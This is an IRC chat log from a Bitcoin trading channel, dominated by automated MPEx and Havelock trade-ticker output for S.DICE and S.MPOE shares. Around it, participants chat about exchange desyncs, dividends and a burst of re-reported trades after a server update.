[MPEX] [S.MPOE] 9736 @ 0.00065408 = 6.3681 BTC [-] Feb 01 22:49:57 [MPEX] [S.MPOE] 14100 @ 0.00065293 = 9.2063 BTC [-] Feb 01 22:49:59 [MPEX] [S.MPOE] 15200 @ 0.00065278 = 9.9223 BTC [-] Feb 01 22:50:00 [MPEX] [S.MPOE] 11679 @ 0.00065239 = 7.6193 BTC [-] Feb 01 22:50:01 [MPEX] [S.MPOE] 4871 @ 0.00065238 = 3.1777 BTC [-] Feb 01 22:50:16 mine could be improved Feb 01 22:53:34 [MPEX] [S.MPOE] 7500 @ 0.00065238 = 4.8929 BTC [-] Feb 01 23:01:24 Ukto: cute icons on bitfunder Feb 01 23:02:22 was Fortress' idea Feb 01 23:02:30 he asked for an icon for his, so I made one for sdice too Feb 01 23:02:44 did you see teh favicon he made for us? :) Feb 01 23:04:42 ah now i see, nice Feb 01 23:04:45 mircea_popescu: where are you getting net speed from? I think regardless of where its too noisy to infer much from spot checks Feb 01 23:05:26 dub i reverse it based on block freq Feb 01 23:05:40 it's certainly noisy Feb 01 23:07:53 [MPEX] [S.MPOE] 7121 @ 0.00065238 = 4.6456 BTC [-] Feb 01 23:07:54 [MPEX] [S.MPOE] 5929 @ 0.00065226 = 3.8672 BTC [-] Feb 01 23:11:16 [MPEX] [S.MPOE] 1821 @ 0.00065226 = 1.1878 BTC [-] Feb 01 23:11:18 [MPEX] [S.MPOE] 9703 @ 0.0006518 = 6.3244 BTC [-] Feb 01 23:11:19 [MPEX] [S.MPOE] 6026 @ 0.00065141 = 3.9254 BTC [-] Feb 01 23:13:19 [MPEX] [S.DICE] 270 @ 0.00739499 = 1.9966 BTC [+] Feb 01 23:14:05 [MPEX] [S.DICE] 8 @ 0.00739499 = 0.0592 BTC [+] Feb 01 23:17:04 [MPEX] [S.MPOE] 10000 @ 0.00065142 = 6.5142 BTC [+] Feb 01 23:17:05 [MPEX] [S.MPOE] 13952 @ 0.00065141 = 9.0885 BTC [-] Feb 01 23:17:07 [MPEX] [S.MPOE] 9359 @ 0.00065091 = 6.0919 BTC [-] Feb 01 23:17:08 [MPEX] [S.MPOE] 2757 @ 0.0006507 = 1.794 BTC [-] Feb 01 23:35:19 [MPEX] [S.MPOE] 4321 @ 0.00065708 = 2.8392 BTC [+] Feb 01 23:35:21 [MPEX] [S.MPOE] 21113 @ 0.00065709 = 13.8731 BTC [+] Feb 01 23:35:22 [MPEX] [S.MPOE] 3916 @ 0.00066031 = 2.5858 BTC [+] Feb 01 23:39:36 mircea_popescu: hey are you there? Feb 01 23:41:30 yea Feb 01 23:42:11 Chilca sup ? Feb 02 00:06:47 Just when I reach the depths of despair... Someone starts buying bitcoins again. Feb 02 00:07:06 lol Feb 02 00:07:41 methinks you're maybe too emotionally invested ? Feb 02 00:08:01 its a highly leveraged position Feb 02 00:08:14 though, if I lost it all, I'd still be up 30% from Jan 1. Feb 02 00:08:17 so Feb 02 00:08:21 in bitcoin terms Feb 02 00:08:59 not bad. Feb 02 00:09:34 mircea_popescu: Your order to BUY 4056 S.DICE @market price has been received and will be processed. Feb 02 00:09:53 mircea_popescu: assbot do not show it Feb 02 00:11:00 mpex was seriously fucked up this morning Feb 02 00:11:07 yeah Feb 02 00:11:12 myeah. Feb 02 00:11:12 2pm UTC Feb 02 00:12:20 mircea_popescu: should I try again? Feb 02 00:12:39 wow, welcome back to the real world bcEUR (exchange finally not giving as many arbitrage opps) Feb 02 00:13:10 yeah. Feb 02 00:14:34 happy to be a SDICE shareholder and put the tuition of my kids in safe hands Feb 02 00:15:11 haha now that's a point Feb 02 00:15:23 ;) Feb 02 00:15:27 hm, is assbot dead ? Feb 02 00:15:43 Gregoriano: dividends paid up? Feb 02 00:15:46 poor jcpham. So am I Feb 02 00:15:59 MPEx ‏@MPEx1 Feb 02 00:15:59 13`014 S.MPOE @ 0.00065051BTC = 8.46573714BTC (= 175.24 USD). 11 #trade #bitcoin #btc #stocks Feb 02 00:16:10 i'm just watching the show i guess Feb 02 00:16:17 i think assbot is ded. Feb 02 00:16:31 Just became a shareholder. Not sure if I need to wait a full month or will dividends will be pro rated Feb 02 00:17:08 no comment on the bitcoin goblin that is satoshidice Feb 02 00:17:31 Gregoriano: you get full dividend if you're the one holding the share at the time of dividend Feb 02 00:17:32 !ticker m s.dice Feb 02 00:17:33 [MPEX:S.DICE] 1D: 0.00711968 / 0.00733749 / 0.00739499 (107244 shares, 786.90 BTC), 7D: 0.00534524 / 0.00724625 / 0.0075 (679325 shares, 4,922.56 BTC), 30D: 0.00085848 / 0.00482134 / 0.0075 (6567424 shares, 31,663.79 BTC) Feb 02 00:17:45 So you should get a full dividend in the next days Feb 02 00:17:47 although i called it a goblin, so that's a comment Feb 02 00:17:57 @Namworld, wow, that's great Feb 02 00:18:32 @Namworld that's great Feb 02 00:18:36 mkay, the good news is the brightest man i know has found a way to squeeze more out of less. Feb 02 00:18:58 update goes up in ~2 hours, hopefully we see at least a few weeks w/o anymore desyncs Feb 02 00:19:11 by which time more ppl write more bots. Feb 02 00:19:21 update to mpex? Feb 02 00:19:25 yes. Feb 02 00:19:29 will be desync to end all desyncs Feb 02 00:19:29 lovely Feb 02 00:19:36 Is that sarcastic? If it is, all I can imagine is someone: Look... if I press harder... more lemon juice comes out. Feb 02 00:19:39 no Feb 02 00:19:50 it is lovely Feb 02 00:19:51 mircea_popescu scaling issues? Feb 02 00:19:59 jurov yea, finally creating that singularity. Feb 02 00:20:16 jcpham you have no idea i tell you. i bet there's pools that do less hashes than mpex does txs Feb 02 00:20:28 i am mining! Feb 02 00:20:31 on cpus Feb 02 00:20:47 mine em' into the ground that's what i say Feb 02 00:20:51 screw the backups Feb 02 00:21:03 i told you, mpex works on multiverse & miltidimensional scale Feb 02 00:21:07 o, yea, i hope you all have mpex back-ups right ? Feb 02 00:21:07 when it's over. call the bitcoins gifts Feb 02 00:22:02 terrible humor. try to keep mpex running though for sure ;) Feb 02 00:23:10 ;;ticker Feb 02 00:23:14 BTCUSD ticker | Best bid: 21.08910, Best ask: 21.09970, Bid-ask spread: 0.01060, Last trade: 21.09970, 24 hour volume: 45928.75755893, 24 hour low: 20.40000, 24 hour high: 21.13000, 24 hour vwap: 20.74014 Feb 02 00:23:19 RALLY ON, WAYNE Feb 02 00:23:57 that's it, I'm turning the sound on Feb 02 00:25:58 oops Feb 02 00:26:01 rally off Feb 02 00:26:04 new wall Feb 02 00:26:24 sneaky bastards Feb 02 00:27:09 [MPEX] [S.MPOE] 22074 @ 0.00065051 = 14.3594 BTC [-] Feb 02 00:28:08 price is already through the roof Feb 02 00:29:07 lol Bugpowder is going to have a child with this rally Feb 02 00:33:22 mpex might be desynced again Feb 02 00:33:53 order executed but is not showing up Feb 02 00:33:59 in stat or web Feb 02 00:35:10 well... now everyone go to coinbr and issue orders furiously :D Feb 02 00:39:36 zeroconfirmations.com I think this is a great URL for a bitcoin blog. Feb 02 00:39:58 -s Feb 02 00:43:48 dispair Feb 02 00:46:54 mkay Feb 02 00:46:56 [BTCTC] [RSM] 46 @ 0.0099 = 0.4554 BTC [+] Feb 02 00:47:02 slightly more advanced dos-thing Feb 02 00:53:53 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:54:02 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:54:03 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:54:05 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:54:06 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:54:07 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:54:08 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [+] Feb 02 00:54:28 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:54:29 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:54:30 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:54:31 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:54:33 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:54:33 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:54:34 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:54:35 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:54:36 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:54:37 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:54:38 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:54:47 eh? Feb 02 00:54:56 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:54:57 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:54:59 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:55:00 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:55:00 I see a bot eating 5 S.DICE at a time Feb 02 00:55:01 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:55:18 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:55:20 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:55:21 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:55:22 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:55:23 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:55:24 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:55:30 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:55:31 skynet it has begun Feb 02 00:55:32 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:55:33 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:55:34 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:55:34 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:55:35 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:55:40 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:55:41 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:55:43 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:55:44 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:55:44 heh Feb 02 00:55:45 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:55:46 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:55:47 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:55:48 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:55:48 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:55:49 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:55:50 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:55:51 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:55:52 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:55:53 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:55:54 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:55:55 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:55:56 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:55:57 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:55:57 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:55:58 this will be painful. Feb 02 00:55:58 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:55:59 I surrender Feb 02 00:55:59 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:00 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:01 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:02 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:03 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:04 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:56:05 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:06 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:07 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:08 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:56:09 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:10 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:56:11 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:12 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:56:13 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:14 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:15 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:16 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:17 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:18 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:19 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:20 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:21 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:22 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:23 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:23 nein nein nein nein nein nein nein nein nein Feb 02 00:56:24 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:25 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:26 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:27 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:28 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:28 lol Feb 02 00:56:29 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:29 lol Feb 02 00:56:30 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:31 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:32 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:32 lol Feb 02 00:56:33 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:33 lol Feb 02 00:56:34 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:34 lol Feb 02 00:56:34 lol Feb 02 00:56:35 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:35 lol Feb 02 00:56:36 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:37 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:38 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:38 lol who was complaining about trades not going through ? Feb 02 00:56:39 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:39 whoever writes after me is dumb Feb 02 00:56:40 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:40 you see nao Feb 02 00:56:41 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:42 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:43 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:44 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:45 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:46 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:47 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:47 HFT!!! :) Feb 02 00:56:48 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:49 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:50 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:51 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:52 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:52 lol Feb 02 00:56:53 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:54 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:56:55 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:56 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:56:57 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:56:58 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:56:59 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:57:00 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:57:00 So... Feb 02 00:57:01 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:57:02 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:57:03 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:04 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:57:05 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:06 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:07 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:57:07 we are very synced nao Feb 02 00:57:08 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:09 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:57:09 You get 0.2% of each sale so... Feb 02 00:57:10 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:11 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:57:12 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:13 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:57:14 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:57:15 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:57:16 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:17 [MPEX] [S.MPOE] 11650 @ 0.00065938 = 7.6818 BTC [+] Feb 02 00:57:18 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:19 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:57:19 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Feb 02 00:57:20 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:57:20 they're not diff sales. just the same batch re-reported Feb 02 00:57:21 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:57:22 [MPEX] [S.DICE] 5 @ 0.00739499 = 0.037 BTC [+] Feb 02 00:57:23 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:24 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:25 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:57:26 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:57:27 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:57:28 [MPEX] [O.BTCUSD.C190T] 1 @ 0.19864392 BTC [-] Feb 02 00:57:29 [MPEX] [O.BTCUSD.C190T] 1 @ 0.20174645 BTC [+] Feb 02 00:57:30 [MPEX] [S.MPOE] 13200 @ 0.00065938 = 8.7038 BTC [+] Feb 02 00:57:37 haha Feb 02 00:57:41 I bought those calls actually Feb 02 00:57:43 did assbot get kicked? Feb 02 00:57:46 yes Feb 02 00:57:47 and only 1 of each was on sale Feb 02 00:57:48 BOOM Feb 02 00:58:03 UH OH Feb 02 00:58:04 To certify that the aforementioned holds as of the quoted time the following with MPEx : To which add orders in the book fully paid in advance : To which add sums deposited as surety for 4th Friday settled option and future contracts : Feb 02 00:58:08 Die, bot, die Feb 02 00:58:21 Bugpowder got pwned Feb 02 00:58:37 or is it bort? or Bart? Feb 02 00:58:52 Bugpowder not really, next stat should be normal Feb 02 00:59:06 Mine is normal Feb 02 00:59:06 are you the s.dice guy evoorhees? fill up your wallet I wanna play 0.1 on 64000x :P Feb 02 01:00:29 no, you must bet on the house Feb 02 01:01:06 ok let's try this again Feb 02 01:01:12 anyone want to buy/sell 1 share of something ? Feb 02 01:01:21 I'll do Feb 02 01:02:02 JohnGalt... the max bet for that is .0783 right now Feb 02 01:02:07 if you win, I'll hunt you down! Feb 02 01:02:16 I want to be they guy who won 130k dollarz, not 100k, will it go back to 0.1? Feb 02 01:03:10 long term, the 64000x has as much chance earning money for SD Feb 02 01:04:42 ok, go for it Namworld Feb 02 01:05:21 My holdings are back Feb 02 01:05:38 hum this isn;'t reporting ;/ Feb 02 01:05:39 [MPEX] [S.BVPS] 1 @ 0.01499986 BTC [-] Feb 02 01:05:42 o wait Feb 02 01:05:44 It is Feb 02 01:05:47 aha! Feb 02 01:05:51 assbot wasn't in here Feb 02 01:06:08 okay. totally different configuration of shit engaged. Feb 02 01:06:17 this should really work much better. we see. Feb 02 01:07:29 you can perhaps allow HTTP/1.1 pipelined requests now :DDD Feb 02 01:09:20 o, no, i'll enjoy last summer-style peace and quiet for at least a few days Feb 02 01:14:01 [MPEX] [S.MPOE] 18500 @ 0.00065092 = 12.042 BTC [+] Feb 02 01:14:03 [MPEX] [S.MPOE] 18500 @ 0.00065092 = 12.042 BTC [+] Feb 02 01:14:48 [MPEX] [S.MPOE] 1 @ 0.00065092 BTC [+] Feb 02 01:15:32 [MPEX] [S.MPOE] 1 @ 0.00065092 BTC [+] Feb 02 01:16:46 [MPEX] [S.MPOE] 1 @ 0.00065092 BTC [+] Feb 02 01:17:08 [MPEX] [S.MPOE] 4750 @ 0.00064937 = 3.0845 BTC [-] Feb 02 01:17:09 [MPEX] [S.MPOE] 10985 @ 0.00064927 = 7.1322 BTC [-] Feb 02 01:18:15 [HAVELOCK] [SDICE] 15 @ 0.79 = 11.85 BTC [+] Feb 02 01:18:43 $20 is the new $20 Feb 02 01:19:10 ;;ticker Feb 02 01:19:12 BTCUSD ticker | Best bid: 20.41001, Best ask: 20.48000, Bid-ask spread: 0.06999, Last trade: 20.41001, 24 hour volume: 50513.17507919, 24 hour low: 20.40000, 24 hour high: 21.13000, 24 hour vwap: 20.72567 Feb 02 01:20:21 [MPEX] [S.MPOE] 4 @ 0.00065092 = 0.0026 BTC [+] Feb 02 01:20:42 !ticker h sdice Feb 02 01:20:43 [HAVELOCK:SDICE] 1D: 0.70500000 / 0.7714362 / 0.89000000 (522 shares, 402.68969702 BTC), 7D: 0.55000001 / 0.72723107 / 0.89000000 (1489 shares, 1082.84706155 BTC), 30D: 0.37000000 / 0.53753253 / 0.89000000 (6278 shares, 3374.62925095 BTC) Feb 02 01:20:50 [MPEX] [S.MPOE] 6512 @ 0.00064927 = 4.228 BTC [-] Feb 02 01:20:50 [MPEX] [S.MPOE] 2288 @ 0.00064855 = 1.4839 BTC [-] Feb 02 01:20:51 [MPEX] [S.MPOE] 2288 @ 0.00064855 = 1.4839 BTC [-] Feb 02 01:21:50 great, now we have echo Feb 02 01:24:08 [MPEX] [S.DICE] 1500 @ 0.00739201 = 11.088 BTC [-] Feb 02 01:24:10 [MPEX] [S.DICE] 8500 @ 0.00739499 = 62.8574 BTC [+] Feb 02 01:24:11 [MPEX] [S.DICE] 8500 @ 0.00739499 = 62.8574 BTC [+] Feb 02 01:26:54 [MPEX] [S.MPOE] 9646 @ 0.00064855 = 6.2559 BTC [-] Feb 02 01:26:56 [MPEX] [S.MPOE] 13842 @ 0.00064852 = 8.9768 BTC [-] Feb 02 01:27:10 echo Feb 02 01:27:14 btw Feb 02 01:27:15 mircea_popescu Feb 02 01:27:19 did you see bitfunders new favicon ? Feb 02 01:27:20 :P Feb 02 01:27:34 [MPEX] [S.DICE] 500 @ 0.00739499 = 3.6975 BTC [+] Feb 02 01:27:54 i hadn't Feb 02 01:28:04 favicom omg. coinbr has favicon too. hand drawn by myself :D Feb 02 01:28:16 [HAVELOCK] [SDICE] 5 @ 0.77 = 3.85 BTC [-] Feb 02 01:28:18 [HAVELOCK] [SDICE] 40 @ 0.765 = 30.6 BTC [-] Feb 02 01:31:14 [MPEX] [S.MPOE] 14008 @ 0.00064852 = 9.0845 BTC [-] Feb 02 01:31:16 [MPEX] [S.MPOE] 5942 @ 0.00064763 = 3.8482 BTC [-] Feb 02 01:37:56 how does https://bitfinex.com/pages/stats determine its bear bull index? Feb 02 01:40:22 [MPEX] [S.DICE] 1000 @ 0.00728888 = 7.2889 BTC [-] Feb 02 01:40:24 [MPEX] [S.DICE] 150 @ 0.00728887 = 1.0933 BTC [-] Feb 02 01:40:25 [MPEX] [S.DICE] 150 @ 0.00728887 = 1.0933 BTC [-] Feb 02 01:40:26 [MPEX] [S.DICE] 400 @ 0.00721781 = 2.8871 BTC [-] Feb 02 01:40:27 [MPEX] [S.DICE] 400 @ 0.00721781 = 2.8871 BTC [-] Feb 02 01:41:06 [MPEX] [S.MPOE] 805 @ 0.00065092 = 0.524 BTC [+] Feb 02 01:43:26 [MPEX] [S.MPOE] 12812 @ 0.0006554 = 8.397 BTC [+] Feb 02 01:44:08 [MPEX] [S.MPOE] 788 @ 0.00064872 = 0.5112 BTC [-] Feb 02 01:44:09 [MPEX] [S.MPOE] 4321 @ 0.0006588 = 2.8467 BTC [+] Feb 02 01:44:11 [MPEX] [S.MPOE] 54892 @ 0.00065881 = 36.1634 BTC [+] Feb 02 01:44:12 [MPEX] [S.MPOE] 7581 @ 0.00066031 = 5.0058 BTC [+] Feb 02 01:44:13 [MPEX] [S.MPOE] 27600 @ 0.0006619 = 18.2684 BTC [+] Feb 02 01:44:14 [MPEX] [S.MPOE] 3432 @ 0.00066304 = 2.2756 BTC [+] Feb 02 01:44:15 [MPEX] [S.MPOE] 1386 @ 0.00066523 = 0.922 BTC [+] Feb 02 01:46:40 hi everyone Feb 02 01:47:36 makomk malaimo markedathome maximian midnightmagic mircea_popescu mjr_ mod6 molecular Feb 02 01:47:38 hi mjr_ Feb 02 01:48:26 i created an online presentation Feb 02 01:48:28 https://docs.google.com/file/d/0B5ZviIIaT7_kYzdaUloyR05La2M/edit?usp=sharing Feb 02 01:48:44 it briefly explains bitcoins in what i hope is easy to understand terms Feb 02 01:49:04 i was hoping that a few people would take a quick skim and let me know if there are any glaring errors Feb 02 01:50:17 